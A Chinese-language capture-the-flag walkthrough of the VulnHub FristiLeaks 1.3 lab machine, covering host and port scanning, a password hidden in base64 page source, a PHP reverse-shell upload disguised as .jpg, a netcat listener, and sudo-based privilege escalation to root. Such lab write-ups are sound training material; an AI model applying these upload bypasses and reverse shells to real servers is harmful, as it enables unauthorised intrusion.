VulnHub – FristiLeaks v1.3

2018-02-06 09:45:14来源:http://sec-redclub.com/index.php/archives/741/作者:红日攻防实验室人点击

分享


VulnHub – FristiLeaks v1.3
环境下载

https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova.torrent https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova


运行环境
Virtualbox (二选一)
Vnware Workstation player
通关提示
fristi
设置

首先,我们在开始之前,我们按照作者的要求设置虚拟机的MAC地址 08:00:27:A5:A6:76



然后开启VM



主机发现
Netdiscover –r 10.10.10.0/24


可以发现目标主机在10.10.10.132的位置


服务发现
nmap -sS -Pn -T4 -p- 10.10.10.132


可以看到打开了80端口,service为HTTP


枚举80端口

既然只有一个端口,那就扫描再具体扫描80端口:


nmap -A -O -p80 10.10.10.132


我们看到以下具体信息:


Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)


http-robots.txt: 3 disallowed entries


现在我们浏览web服务



现在我们需要验证robots.txt是否存在,在很多情况下,nmap是很准确的。



现在,如果根据条目能顺利进入系统,那就太容易了,肯定不会那么容易的。



意料之中,上面三个条目都只能进入这个画面


所以这三个已经没有什么用了,我们现在来跑一下目录;


dirb http://10.10.10.132



没什么特别的发现,只有几张照片;



不过这个keep-calm 似乎是一个提示,因为他说


KEEP CALM AND DRINK FRISTI


试试 http://10.10.10.132/fristi/



很好,真的有一个登录口!但是这个登录界面有一个很差的设定,两个输入框都有自动完成的功能。(包括密码)




我们再次运行 目录枚举:


dirb http://10.10.10.132/fristi/



发现了index页面 不过...



好像是个死胡同。


不过永远不要只事物看到表面,我们一定要看看代码!



看到一有一条信息,这是一个叫eezeepz的人留下来的。


那么那就有这种可能:他也许用eezeepz当做他的用户名或者密码。


再向下看。我们看到了一大块用base64编码的段落



这里我使用nano 使它变成单行,方便命令行编码


base64 -d /tmp/encoded.txt


这是一个PNG格式的图画,保存为PNG


base64 -d /tmp/encoded.txt > decoded.png

然后可以用任意工具查看,这里用feh



看起来像是个密码!赶紧试试


username:eezeepz


password:keKkeKKeKKeKkEkkEk



这时候 不用多说 上传sell


Sell 可以在这里下载


http://pentestmonkey.net/tools/web-shells/php-reverse-shell
cp /usr/share/webshells/php/php-reverse-shell.php reverse-shell.php
vi reverse-shell.php

做一些必要的修改,ip地址和监听端口。



现在设置 netcat 监听 建立连接:


nc -nlvp 8888


看来只有png, jpg, gif 能上传



修改一下后缀加上.jpg




上传成功!



现在打开上传的sell





现在已经得到了一个低端权限




权限提升




看一下目录,看看有什么可以挖掘的东西,个人对HOME比较感兴趣,进去试试





居然马上看到关键人物eezeepz!


继续向前看



文件很多 挑特别的看,notes.txt比较显眼,打开试试。




我们得到了提示,照着做就行了!


在/tmp下创建一个"runtis"文件



赋予权限


现在我们可以阅读 /home/admin 下的内容了



有几个文件。依次看一下


cryptpass.py



Cryptepass.txt




whoisyourgodnow.txt



看样子应该是用了py文件去加密的。


我们重写一下文件:




解密试试







分别得到


1.mVGZ3O3omkJLmy2pcuTq :thisisalsopw123


2.=RFn0AKnlMHMPIzpyuTI0ITG :LetThereBeFristi!


这有可能是用户fristgod 的密码


我们换一下用户试试!





失败了....


查了一下网上是这样解释的:


跟 su 命令的实现有关; B环境上su的实现应该是判断标准输入是不是tty ; 而A环境上su的实现则允许从其他文件读取密码。


方法如下:


Python -c 'import pty;pty.spawn("/bin/sh")'


接下来就可以正常使用了。




现在我们已经成功进入fristigod账户


Ls试试:





没有东西...


-la试试



原来都藏起来了。。


到.secret_admin_stuff看看



继续 ls -la 查看具体信息




发现这个是个root的文件


权限应该是不够的



我们能回去看看history有没有一些线索



可以看到 “fristigod”用户一直sudo来执行命令


试试 sudo -l



让输入密码,上面我们得到了两个密码



呃。。。


再试试



成功了...居然是一个密码....好吧。



现在我们能用id 那么应该也可以创建一个sell


sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash



成功了。直接去看/root下的文件



得到flag



结束,感谢Ar0xA


微信扫一扫

第七城市微信公众平台